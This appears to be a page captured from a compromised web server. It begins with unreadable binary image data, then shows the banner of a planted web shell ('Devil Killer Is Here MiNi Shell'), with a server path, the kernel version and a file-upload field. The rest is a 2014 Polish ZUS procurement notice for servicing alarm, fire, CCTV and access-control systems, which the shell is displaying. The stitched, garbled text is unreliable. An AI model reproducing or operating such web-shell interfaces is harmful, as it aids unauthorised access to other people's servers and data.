JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141215/410172-N-2014.html

<p class="kh_header"><b>Toruń: SERWIS SYSTEMÓW SYGNALIZACJI POŻARU, WŁAMANIA, NAPADU, TV PRZEMYSŁOWEJ ORAZ KONTROLI DOSTĘPU - ZUS, ODDZIAŁY W BYDGOSZCZY I GDAŃSKU</b><br>
<b>Numer ogłoszenia: 410172 - 2014; data zamieszczenia: 15.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Toruniu , ul. Mickiewicza 33-39, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 056 6109320, faks 056 6109496.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SERWIS SYSTEMÓW SYGNALIZACJI POŻARU, WŁAMANIA, NAPADU, TV PRZEMYSŁOWEJ ORAZ KONTROLI DOSTĘPU - ZUS, ODDZIAŁY W BYDGOSZCZY I GDAŃSKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1 Przedmiotem zamówienia jest wykonywanie Serwisu, polegającego na:
1) konserwacjach* i przeglądach** (zwanych łącznie konserwacjami) oraz naprawach*** systemów:
a) pożaru;
b) włamania;
c) napadu;
d) TV przemysłowej;
e) kontroli dostępu;
- eksploatowanych w ZUS Oddział w Bydgoszczy.

2) konserwacjach* i przeglądach** (zwanych łącznie konserwacjami) systemów:
a) pożaru;
b) włamania;
c) napadu;
d) TV przemysłowej;
e) kontroli dostępu;
- eksploatowanych w ZUS Oddział w Gdańsku.
*  KONSERWACJE to zespół czynności służących utrzymaniu urządzeń w sprawności bez konieczności przeprowadzania naprawy;
** PRZEGLĄDY to zespół czynności kontroli urządzeń, mający na celu wykrycie nieprawidłowości w ich funkcjonowaniu lub uszkodzeń w ich strukturze;

*** NAPRAWY to zespół czynności, których celem jest przywrócenie sprawności urządzenia;.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.71.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W CZĘŚCI I PRZEDMIOTU ZAMÓWIENIA -Bydgoszcz
Warunkiem uzyskania zamówienia jest posiadanie:
1) aktualnego zezwolenia wydane przez Prezesa Państwowej Agencji Atomistyki, co najmniej w zakresie działalności określonej w art. 4 ust. 1 pkt 4 ustawy z dnia 29 listopada 2000 r. Prawo atomowe (Dz. U. z 2012 r., poz. 264 ze zm.);
2) aktualnej koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221 ze zm.) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego, polegającego co najmniej na montażu urządzeń i środków mechanicznego zabezpieczenia oraz ich eksploatacji, konserwacji, naprawach i awaryjnym otwieraniu w miejscach zainstalowania.
W celu wykazania spełniania warunku Wykonawcy winni złożyć:
1) oświadczenie o spełnianiu warunku udziału w postępowaniu;
2) aktualne zezwolenie wydane przez Prezesa Państwowej Agencji Atomistyki co najmniej w zakresie, o którym mowa w warunku; 
3) aktualną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji, co najmniej w zakresie, o którym mowa w warunku.

W CZĘŚCI II PRZEDMIOTU ZAMÓWIENIA - Gdańsk
Warunkiem uzyskania zamówienia jest posiadanie aktualnej koncesji wydanej przez Ministra Spraw Wewnętrznych i Administracji na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221 ze zm.) na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego, polegającego co najmniej na montażu urządzeń i środków mechanicznego zabezpieczenia oraz ich eksploatacji, konserwacji, naprawach i awaryjnym otwieraniu w miejscach zainstalowania.

W celu wykazania spełniania warunku Wykonawcy winni złożyć:
1) oświadczenie o spełnianiu warunku udziału w postępowaniu;
2) aktualną koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji, co najmniej w zakresie, o którym mowa w warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W CZĘŚCI I PRZEDMIOTU ZAMÓWIENIA -Bydgoszcz
Warunkiem uzyskania zamówienia jest posiadanie wiedzy i doświadczenia uzyskanych w okresie ostatnich trzech lat przed upływem terminu składania ofert (jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), w trakcie wykonywania przez okres nie krótszy niż 12 miesięcy, zamówienia lub zamówień obejmujących łącznie lub pojedynczo wykonywanie konserwacji systemów: 
1) sygnalizacji pożaru, sterowanego centralą SIEMENS;
2) sygnalizacji pożaru, sterowanego centralą POLON;
3) sygnalizacji włamania, napadu i kontroli dostępu sterowanych centralą DSC-4020;
4) telewizji przemysłowej.

W CZĘŚCI II PRZEDMIOTU ZAMÓWIENIA - Gdańsk
Warunkiem uzyskania zamówienia jest posiadanie wiedzy i doświadczenia uzyskanych w okresie ostatnich trzech lat przed upływem terminu składania ofert (jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), w trakcie wykonywania przez okres nie krótszy niż 12 miesięcy, zamówienia lub zamówień obejmujących łącznie lub pojedynczo wykonywanie konserwacji systemów: 
1)	sygnalizacji włamania i napadu, sterowanego centralą ADEMCO składający się z co najmniej 70 czujek;
2)	sygnalizacji włamania, napadu, kontroli dostępu oraz CCTV składający się z co najmniej: 100 czujek, 10 przejść z kontrolą dostępu, 16 kamer;
3)	sygnalizacji pożaru, sterowanego centralą AUTRONICA;
4)	kontroli dostępu ROGER składający się z co najmniej 6 kontrolerów, w tym z co najmniej jednym kontrolerem w dźwigu;
5)	zamknięć ogniowych D+H składającego się z co najmniej 2 drzwi;
6)	oddymiania D+H składającego się z co najmniej 2 klap.
W obu częściach przedmiotu zamówienia, w celu wykazania spełniania warunku Wykonawcy winni złożyć:
1)	oświadczenie o spełnianiu warunku udziału w postępowaniu;
2)	Wykaz zamówień, w którym winny zostać wymienione zamówienia spełniające kryteria określone w warunku oraz wymagane informacje (ODSYŁACZ);
3)	dowody potwierdzające, że zamówienia wymienione w Wykazie zamówień zostały wykonane lub są wykonywane należycie, to jest:
a)	poświadczenia, z tym że w odniesieniu do nadal wykonywanej usługi poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,

		lub 

b)	oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia; w takim przypadku Zamawiający wymaga, aby wykonawca udowodnił, że nie był w stanie uzyskać poświadczenia;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W CZĘŚCI I PRZEDMIOTU ZAMÓWIENIA - Bydgoszcz
Warunkiem uzyskania zamówienia jest dysponowanie osobą lub osobami - które będą uczestniczyły w wykonywaniu zamówienia, które łącznie lub pojedynczo posiadają kwalifikacje do wykonywania czynności:
1)	na stanowisku dozoru w zakresie konserwacji i kontrolno-pomiarowym urządzeń i instalacji o napięciu nie wyższym niż 1 kV;

2)	ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego, polegającego, co najmniej na montażu, konserwacji i naprawach elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia.

W celu wykazania spełniania warunku Wykonawcy winni złożyć:
1)	oświadczenie o spełnianiu warunku udziału w postępowaniu;
2)	Wykaz osób, w którym należy wymienić osobę, która będzie uczestniczyć w wykonywaniu zamówienia, spełniającą wymagania określone w warunku, z podaniem wymaganych informacji (Bydgoszcz - załącznik 2a (ODSYŁACZ));
3)	oświadczenie, że osoba wymieniona w Wykazie osób, odpowiednio:

a)		osoba, która będzie odpowiedzialna za wykonywanie czynności na stanowisku dozoru:
- posiada aktualne świadectwo kwalifikacyjne 	uprawniające do wykonywania pracy na stanowisku 	dozoru w zakresie konserwacji i kontrolno-	pomiarowym urządzeń i instalacji o napięciu nie 	wyższym niż 1 kV; *
b)	osoba, która będzie odpowiedzialna za wykonywanie czynności konserwacji i napraw:
- 	została wpisana na listę kwalifikowanych pracowników 	zabezpieczenia technicznego;**

- treść oświadczenia znajduje się w Wykazie osób (Bydgoszcz - załącznik 2a).

W CZĘŚCI II PRZEDMIOTU ZAMÓWIENIA - Gdańsk
Warunkiem uzyskania zamówienia jest dysponowanie osobą lub osobami - które będą uczestniczyły w wykonywaniu zamówienia, które łącznie lub pojedynczo posiadają kwalifikacje do wykonywania czynności:
1)	na stanowisku dozoru w zakresie konserwacji i kontrolno-pomiarowym urządzeń i instalacji o napięciu nie wyższym niż 1 kV;
2)	na stanowisku eksploatacji w zakresie konserwacji i kontrolno-pomiarowym urządzeń i instalacji o napięciu nie wyższym niż 1 kV;
3)	ochrony osób i mienia realizowanych w formie zabezpieczenia technicznego, polegającego, co najmniej na montażu, konserwacji i naprawach elektronicznych urządzeń 
i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia.
4)	w zakresie konserwacji systemów:
a)		ADEMCO (w zakresie sygnalizacji pożaru, włamania 
i napadu);
b)		UTC FIRE & SECURITY (w zakresie sygnalizacji włamania, napadu oraz kontroli dostępu);
c)		AUTRONICA (sterowanych centralami Autrosafe lub Autoprime);
d)		ROGER (w zakresie kontroli dostępu typu RACS);
e)		D+H (w zakresie oddymiania i zamknięć ogniowych).

W celu wykazania spełniania warunku Wykonawcy winni złożyć:
1)	oświadczenie o spełnianiu warunku udziału 
w postępowaniu;
2)	Wykaz osób, w którym należy wymienić osobę, która będzie uczestniczyć w wykonywaniu zamówienia, spełniającą wymagania określone w warunku, z podaniem wymaganych informacji, (Gdańsk - załącznik 2b (ODSYŁACZ));
3)	oświadczenie, że osoba wymieniona w Wykazie osób, odpowiednio:
a)		osoba, która będzie odpowiedzialna za wykonywanie czynności na stanowisku dozoru:
- posiada aktualne świadectwo kwalifikacyjne
	uprawniające do wykonywania pracy na stanowisku 	dozoru w zakresie konserwacji i kontrolno-	pomiarowym urządzeń i instalacji o napięciu nie 	wyższym niż 1 kV; *
b)		osoba, która będzie odpowiedzialna za wykonywanie czynności na stanowisku eksploatacji:
- posiada aktualne świadectwo kwalifikacyjne
	uprawniające do wykonywania pracy na stanowisku 	eksploatacji w zakresie konserwacji i kontrolno-	pomiarowym urządzeń i instalacji o napięciu nie 	wyższym niż 1 kV; *

c)		osoba, która będzie odpowiedzialna za wykonywanie czynności konserwacji i napraw:
  - 	została wpisana na listę kwalifikowanych pracowników zabezpieczenia technicznego;**

- treść oświadczenia znajduje się w Wykazie osób Gdańsk - (załącznik 2b);


* O którym mowa w Rozporządzeniu Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89, poz. 828 ze zm.).

** O której mowa w ustawie z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (tekst jednolity: Dz. U. z 2005 r. Nr 145, poz. 1221 ze zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz oferty - wzór formularza stanowi załącznik 1 (ODSYŁACZ);

2) Formularz cenowy - wzór formularza stanowią załączniki 2a i 2b (Bydgoszcz - załącznik 2a (ODSYŁACZ), Gdańsk 2b (ODSYŁACZ)).

3) Pełnomocnictwo - w przypadku, gdy ofertę podpisze(ą) osoba(y) inna niż wymieniona w odpisie z właściwego rejestru lub innym dokumencie wskazującym sposób reprezentacji Wykonawcy(ów).

Pełnomocnictwo winno: 
- być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez udzielającego pełnomocnictwa albo przez notariusza;
- wskazywać pełnomocnika i zakres umocowania pełnomocnika.

Jeżeli dalsze pełnomocnictwo (substytucja) do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego będzie udzielone przez pełnomocnika Wykonawcy, należy załączyć (forma jak wyżej) również dalsze pełnomocnictwo.
 
4)	Pisemne zobowiązanie podmiotu trzeciego - w przypadku, gdy wykonawca będzie korzystał z zasobów podmiotu trzeciego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - czas przystępowania do: 1) naprawy (cz. I); 2) diagnozowania (cz. II) - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W CZĘŚCI I PRZEDMIOTU ZAMÓWIENIA -Bydgoszcz
1.	Wykonawca bez pisemnej zgody Zamawiającego nie może dokonywać przeniesienia praw i obowiązków wynikających z niniejszej umowy.

2.	Zmiana umowy w zakresie wynagrodzenia Wykonawcy jest dopuszczalna:

1)	w przypadku wyłączenia Systemu z eksploatacji, o wartość niezrealizowanych konserwacji wyłączonego Systemu;

2)	z zastrzeżeniem postanowień zawartych w ust. 3 i 4, w przypadku zmiany:

a)	stawki podatku od towarów i usług;

b)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę;

c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;

- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.

3.	W przypadku zmiany przepisów, o których mowa w ust. 1 pkt 2, skutkujących istotną zmianą kosztów wykonania przedmiotu umowy przez Wykonawcę, każda ze stron Umowy, w terminie 30 dni od dnia wejścia w życie przepisów wprowadzających te zmiany, może wystąpić do drugiej Strony o przeprowadzenie negocjacji w sprawie dokonania odpowiedniej zmiany wysokości wynagrodzenia.

4.	Podstawą do przeprowadzenia negocjacji, o których mowa w ust. 3 będzie przedstawiana każdorazowo Zamawiającemu kalkulacja kosztów Wykonawcy, uwzględniająca wpływ wejścia w życie przepisów wprowadzających te zmiany na koszty wykonania przedmiotu umowy przez Wykonawcę. Wykonawca będzie zobowiązany do przedstawienia stosownej kalkulacji na pisemne żądanie Zamawiającego, w terminie 5 dni roboczych od otrzymania żądania. 

5.	Zmiana treści umowy wymaga zachowania formy pisemnej pod rygorem nieważności.

6.	Każda ze Stron może jednostronnie dokonać zmiany treści umowy w zakresie zmiany osób, numerów telefonów, faksów oraz adresów, wskazanych w niniejszej umowie, powiadamiając o tym pisemnie drugą stronę, w terminie nie dłuższym niż 7 dni od dokonania zmiany. Zmiany te nie wymagają formy aneksu do umowy. 

W CZĘŚCI II PRZEDMIOTU ZAMÓWIENIA - Gdańsk
1.	Wykonawca bez pisemnej zgody Zamawiającego nie może dokonywać przeniesienia praw i obowiązków wynikających z niniejszej umowy.

2.	Zmiana umowy w zakresie wynagrodzenia Wykonawcy jest dopuszczalna:

1)	w przypadku wyłączenia Systemu z eksploatacji, o wartość niezrealizowanych przeglądów wyłączonego Systemu;

2)	z zastrzeżeniem postanowień zawartych w ust. 3 i 4, w przypadku zmiany:

a)	stawki podatku od towarów i usług;

b)	wysokości minimalnego wynagrodzenia za pracę ustalonego 
na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. 
o minimalnym wynagrodzeniu za pracę;

c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne;

-  	jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia 	przez Wykonawcę.

